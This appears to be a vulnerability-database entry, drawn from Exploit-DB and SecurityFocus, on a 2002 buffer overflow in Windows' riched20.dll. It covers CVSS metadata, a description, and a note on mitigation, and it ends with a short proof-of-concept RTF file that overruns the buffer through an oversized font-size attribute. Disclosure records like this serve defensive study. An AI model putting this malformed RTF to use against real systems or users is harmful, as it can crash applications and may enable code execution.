Riched20.dll Buffer Overflow Vulnerability

vendor:

Riched20.dll

by:

SecurityFocus

7.5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Riched20.dll

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows NT, Windows XP

2002

Riched20.dll Buffer Overflow Vulnerability

The riched20.dll is vulnerable to a buffer overflow that results in the application calling the library to fail. By creating a Rich Text Format (RTF) file with more than 65536 bytes of data in an attribute, the buffer will be overrun. Execution of arbitrary code may be possible. RTF files may be opened automatically by Internet Explorer and Outlook.

Mitigation:

Ensure that all software is up to date and patched with the latest security updates.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/6874/info

The riched20.dll is vulnerable to a buffer overflow that results in the application calling the library to fail. By creating a Rich Text Format (RTF) file with more than 65536 bytes of data in an attribute, the buffer will be overrun.

Execution of arbitrary code may be possible.

RTF files may be opened automatically by Internet Explorer and Outlook.

** Some reports indicate that this vulnerability could not be reproduced on riched20.dll v.3.0 (5.30.23.1200) running on Windows NT or riched20.dll v.3.0 (5.30.23.1211) running on Windows XP. 

{\rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052{\fonttbl{\f0
\fnil\fprq2\fcharset134 \'cb\'ce\'cc\'e5;}}
{\colortbl ;\red255\green0\blue255;}
\viewkind4\uc1\pard\cf1\kerning2\f0
\fs18121111111111111111111111111111111110000 www.yoursft.com\fs20\par
}